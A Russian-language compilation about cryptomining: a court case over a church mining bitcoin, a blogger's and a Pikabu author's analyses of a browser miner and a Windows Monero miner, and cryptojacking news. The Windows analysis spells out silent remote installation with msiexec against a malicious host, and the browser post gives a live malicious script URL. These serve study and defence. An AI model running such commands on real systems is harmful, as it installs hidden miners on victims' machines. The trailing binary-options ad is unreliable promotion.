Наличие доступа к сети Интернет, а также значительный объем потребленной электрической энергии, является достаточным, что позволяет суду прийти к выводу о том, что в спорный период истцом осуществлялась деятельность по «добыванию биткоинов», что, очевидно, не относится в религиозной деятельности, — отметили судьи.
А раз церковь фактически занимается коммерческой деятельностью, то и льготный тариф (97 коп. за кВт./ч) на нее не распространяется, а значит, энергетики вправе перерасчитать тариф как для промышленности — почти 3 рубля за кВт/ч)

Как следует из материалов дела, значительное увеличение объема потребления
истцом электрической энергии в мае 2020 в сравнении с прошлым периодом (апрель
2020) обусловлено расположением в нежилом помещении на втором этаже
производственного цеха по адресу: г. Иркутск, ул. Ширямова, 2 (2 этаж) серверной
станции, подтверждается Актом целевой проверки № 1525 от 05.06.2020. Признаков
деятельности религиозной организации в соответствии с кодом ОКВЭД 94,91 не
обнаружено. Проверка проводилась с использованием средств фотофиксации,
материалы фотофиксации (на фото зафиксировано наличие серверных установок),
приложены к Акту. Акт подписан инженером-инспектором Катышевцевым А.А.

Кроме того, в ходе судебного разбирательства, в судебном заседании были
допрошены в качестве свидетелей Катышевцев А.А. (инженер-инспектор ООО
«ИРКУТСКЭНЕРГОСБЫТ»), Кащин Л.Б. (начальник технического отдела аудита ООО
«ИРКУТСКЭНЕРГОСБЫТ» и Демеев А.В. (специалист инженер-электроник отдела по
обслуживанию рабочих мест Иркутского куста ООО «Учетно-сервисный центр
ЕвроСибЭнерго») (личность свидетелей судом установлена, разъяснены права и
обязанности).

И далее описано, что свидетели всё подтвердили.

Здравомыслие от суда:

При этом суд учитывает, что само
по себе наличие доступа к сети Интернет, не является доказательством
осуществления майнинговых операций.

Всё что нужно знать о майнинге

О том, как я крипту зарабатывал. для других

Подыскивал я очередную ардуину. Захожу я на сайт mgbot.ru, который торгует всякой электроникой и появляется чувство некоторого торможения.

(для ленивых — /bitrix/js/main/core/core_loader.js с сайта в

75% случаев подгружает майнер)

Проверяюсь — по SHIFT+ESC в Хроме есть свой диспетчер задач. Красота — все 4 ядра процессора почти целиком забиты полезной деятельностью, только мне немного оставили, чтоб казалось, что всё в порядке.

Полез к диспетчеру задач, может быть зря переживаю?

А нет. не зря. Ну что, лунная клизма призма, а нет, ИНСТРУМЕНТЫ РАЗРАБОТЧИКА (F12) дайте мне силы!

Наблюдаются непонятные процессы, которые у честных сайтов обычно отсутствуют в принципе. Как выяснилось — подгружается WASM сборка, которая делает что-то.

Знаем имя файла, можем на вкладке сети посмотреть — кто его вызвал. Какое чудесное имя вызывает эти странные нагрузки — crypta.js, а откуда оно появилось?

Файл crypta.js содержит исключительно не подозрительный текст (пжалте ссылочку — https://reauthenticator.com/lib/crypta.js?w=2028 ) . А вызывается это счастье из https://mgbot.ru/bitrix/js/main/core/core_loader.js?v=0.3.1 , который скорей всего входит в типовой набор файлов сайта на битриксе, что как бы намекает, что бедный несчастный программист, живя впроголодь, решил немного обогатиться за счет работой-дателя и всех, у кого есть браузер, имевших несчастье попасть на сайт и дописал несколько строк.

Что же происходит внутри?

1. Случайное число до 4 выбирает, чем мы будем заниматься. Если 1 — то честная деятельность чего-то там, а вот 2-3-4, или если в воздухе повиснет — начинаем обогащать разные кошельки, если я правильно понял текст:

2. Подгружается JS-скрипт, который оглядывается в компьютере и начинает полезную деятельность.

Сохранил я этот файл на компьютере, отдал посмотреть VirusTotal, а он и говорит — всего-лишь подозрительное нечто, да и то по мнению только двух антивирусов.

Посмотрим на авторов crypta.js — сайт reauthenticator.com перекидывает на:

Кажется тут уже можно остановиться.

1. Программисты тоже бедные люди

2. Если сделал программист доброе дело, ты проверь и выкинь лишнее.

Авторам сайта извещение ушло. Кто хочет приобщиться к криптовалюте бесплатно без смс и установки дополнительных программ — заходите 🙂

Хакеры используют правительственные сайты Индии для скрытого майнинга

Индийское издание Economic Times сообщило, что официальные правительственные сайты стали подверглись атаке хакеров, занимающихся незаконным майнингом криптовалют. Группа экспертов по кибербезопасности проанализировала состояние более чем 4000 сайтов, запустив на их страницах программный код, позволяющий распознать присутствие сценария скрытого криптомайнинга. В итоге оказалось, что скриптом поразили официальные сайты руководителя муниципальной администрации Андхра-Прадеша, а также муниципалитетов Тирупати и Мачерла.

По данным исследователей, речь идёт о поддоменах официального портала правительства штата Андхра-Прадеш ap.gov.in, который посещают более 160 000 человек в месяц.

«Хакеры предпочитают майнить криптовалюты через правительственные сайты из-за высокой посещаемости последних, а также по причине доверия, которое люди испытывают к этим ресурсам. Мы не раз наблюдали хакерские атаки на правительственные сайты. Но теперь в моде криптоджекинг, поскольку это более прибыльное занятие»

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство «мастеров», думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker’ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ — открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):

В автозагрузке, повторюсь всё в порядке:

После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов — ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует «Планировщик заданий» (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Дальше я стал копать и выяснил, что бирюзовое окно — это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2020 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива — всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это — файл инсталлятора чего-либо:

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Собственно, как оказалось, программа никаких файлов в себе не содержала — только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal’е, и получил следующий результат:

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю — скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз — да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом — если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково — обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется «Info-Zip UnZip», и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик — что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает — распаковываются файлы только оригинальным UnZip’ом при помощи этой команды.
Все файлы внутри архива — исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Этот файл представляет собой json — конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету «Monero». Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера «****Rig»:

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую «работу», и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом — никаких окон).

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

В Госдуму внесён законопроект о криптовалютах: майнеров заставят зарегистрироваться как ИП

20 марта 2020 года депутаты Государственной Думы А.Г.Аксаков, И.Б.Дивинский, О.А.Николаев, Р.М.Марданшин, а также член Совета Федерации Н.А.Журавлёв представили законопроект № 419059-7 «О цифровых финансовых активах» http://sozd.parlament.gov.ru/bill/419059-7

Цели законопроекта следующие: законодательное закрепление в правовом поле определений криптовалюты, токена, распределённого реестра цифровых транзакций (блокчейна) и смарт-контракта; создание правовых условий для привлечения юрлицами и ИП инвестиций путём выпуска токенов.

Согласно законопроекту, и криптовалюта, и токен являются имуществом. Прямо устанавливается, что цифровые финансовые активы не являются законным средством платежа на территории Российской Федерации.

Кроме того, майнинг признаётся предпринимательской деятельностью в случае, когда лицо, которое его осуществляет, в течение трёх месяцев подряд превышает лимиты энергопотребления, установленные правительством РФ.

Законопроект закрепляет правовые основы для осуществления майнинга и валидации цифровых транзакций (деятельность по подтверждению действительности цифровых записей в распределённом реестре цифровых транзакций).

Цифровое имущество (токены и криптовалюту) можно обменивать на рубли или иностранную валюту. При этом возможность обмена, а также порядок и условия обмена будут определяться Банком России по согласованию с Правительством РФ. Все сделки должны осуществляться через операторов обмена цифровых финансовых активов, которыми могут быть только юридические лица, созданные в соответствии с законодательством. Сделки должны осуществляться в соответствии с Правилами организованных торгов цифровыми финансовыми активами, зарегистрированными в Центральном банке Российской Федерации.

Цифровые записи, содержащие информацию о таких сделках, будут храниться в цифровых кошельках, открытых сторонам сделки оператором обмена цифровых финансовых активов. Порядок открытия, хранения информации о цифровых записях, ведения, закрытия цифрового кошелька, а также требования к защите цифровых кошельков устанавливаются Центральным банком Российской Федерации.

Особое место в законопроекте занимает статья, которая устанавливает правовые основы для проведения ICO. Эта статья устанавливает последовательность действий, необходимых для ICO, определяет состав обязательной публичной оферты и закрепляет необходимость раскрытия дополнительной информации лицом, выпускающим токены.

Публичная оферта о выпуске токенов должна быть подписана усиленной квалифицированной электронной подписью лица, осуществляющего функции единоличного исполнительного органа юридического лица – эмитента или индивидуального предпринимателя – эмитента.

Для защиты неквалифицированных инвесторов (обычных граждан) законопроект наделяет Банк России полномочием по установлению ограничения в отношении суммы приобретения токенов такими лицами. Предполагается, что участвовать в ICO смогут неквалифицированные инвесторы с суммой вложений до 50 тыс. руб.

Сейчас законопроект направлен для рассмотрения в комитет Госдумы по финансовому рынку. Срок представления отзывов, предложений и замечаний истекает 3 апреля 2020 года. Предположительно в апреле он будет вынесен для рассмотрения Госдумой.

После принятия закона потребуется внести ряд подзаконных актов, а также изменения в административный и уголовный кодекс для лиц, нарушающих закон. Например, уголовная ответственность за незаконный оборот денежных суррогатов может составить до четырёх лет лишения свободы.

Майнеры, которые не зарегистрируются в качестве индивидуальных предпринимателей, будут привлечены к ответственности за незаконную предпринимательскую деятельность по статье 171 УК РФ, которая наказывается штрафом до 300 тыс. руб. или обязательными работами на срок до 480 часов, или арестом на срок до 6 месяцев. То же деяние, совершённое группой или сопряжённое с извлечением дохода в особо крупном размере наказывается штрафом до 500 тыс. руб. или принудительными работами на срок до 5 лет или лишением свободы на срок до 5 лет со штрафом.

Сейчас предложения по потреблению майнерами электроэнергии и их возможной ответственности готовит Минкомсвязи. По словам экспертов, вычислить майнеров очень легко по круглосуточному профилю потребления электроэнергии.

Майнеры Coinhive обнаружены в Android-приложениях и на WordPress-сайтах

Начиная с сентября 2020 года мы наблюдаем за явлением, которое получило имя криптоджекинг (cryptojacking). Суть криптоджекинга предельно проста: в код сайтов внедряют специальные скрипты, которые конвертируют мощности CPU посетителей ресурса в криптовалюту. Фактически, это просто майнинг через браузеры.

Проблема заключается в том, что владельцы сайтов далеко не всегда встраивают майнинговые скрипты в код своих ресурсов добровольно, чаще сайты подвергаются взлому с этой целью. К тому же, даже если майнер не был установлен насильно, третьей стороной, сами владельцы сайтов тоже крайне редко предупреждают о происходящем посетителей и не предоставляют им возможности отключения майнеров.

Как мы уже рассказывали ранее, все это вызывает крайне негативную реакцию у ИБ-специалистов. К примеру, компания Cloudflare уже начала блокировать такие ресурсы и пояснила, что расценивает действия владельцев таких сайтов как вредоносные.

Пользователям, в свою очередь, рекомендуется не пренебрегать антивирусными продуктами и блокировщиками рекламы, которые блокируют работу скриптов. Также уже появились специальные «противомайнинговые» расширения для браузеров: AntiMiner, No Coin, и minerBlock. Плюс пользователь всегда может просто отключить Javascript самостоятельно или установив соответственные расширения для браузера (к примеру, NoScript и ScriptBlock).

Однако осуждение со стороны ИБ-сообщества, похоже, мало тревожит операторов майнинговых сервисов и их клиентов. Наиболее популярным в настоящее время является сервис Coinhive, у которого уже появилось немало подражателей, число которых продолжает расти. Недавно специалисты даже запустили специальный сайт WhoRunsCoinhive, на котором можно проверить, какие ресурсы используют скрипты Coinhive. Но проблемными теперь могут оказаться не только сайты.

Сегодня 30 октября 2020 года, специалисты Trend Micro и вовсе сообщили, что им удалось обнаружить майнинговые скрипты в составе трех приложений для Android. Причем приложения Recitiamo Santo Rosario Free и SafetyNet Wireless App были свободно доступны в официальном каталоге Google Play. Очевидно, все проверки безопасности Google не сумели обнаружить, что программы запускают майнера в фоновом режиме, с помощью WebView.

Также специалисты обнаружили в Google Play третье приложение, Car Wallpaper HD: mercedes, ferrari, bmw and audi, которое не задействовало WebView, но использовало библиотеку CpuMiner, то есть майнило даже без открытия браузера.

Исследователи Trend Micro с тревогой отмечают, что приложениям не нужно запрашивать никаких дополнительных разрешений для такой активности, а сама работа майнера может провоцировать перегрев устройства, значительно сокращать «срок жизни» батареи и, разумеется, сказываться на производительности девайса.

Еще одно неприятное известие поступило от аналитиков компаний Sucuri и Wordfence, которые зафиксировали вредоносную кампанию, направленную против сайтов на базе WordPress (а также Magento, Joomla и Drupal). По данным Sucuri , неизвестные злоумышленники из одной группировки скомпрометировали уже более 500 ресурсов. Попав на такой сайт, пользователи Firefox видят классическое поддельное сообщение, гласящее, что им срочно необходимо установить новый набор шрифтов. А пользователям Chrome, в свою очередь, приходится иметь дело с обфусцированной и сильно видоизмененной версией Coinhive.

ТОП площадок для торговли бинарными опционами:
  • Бинариум
    Бинариум

    1 место в рейтинге! Самый честный и надежный брокер бинарных опционов!
    Идеально подходит для новичков и средне-опытных трейдеров.
    Бесплатное обучение и демо-счет!
    Дают бонус за регистрацию:

Добавить комментарий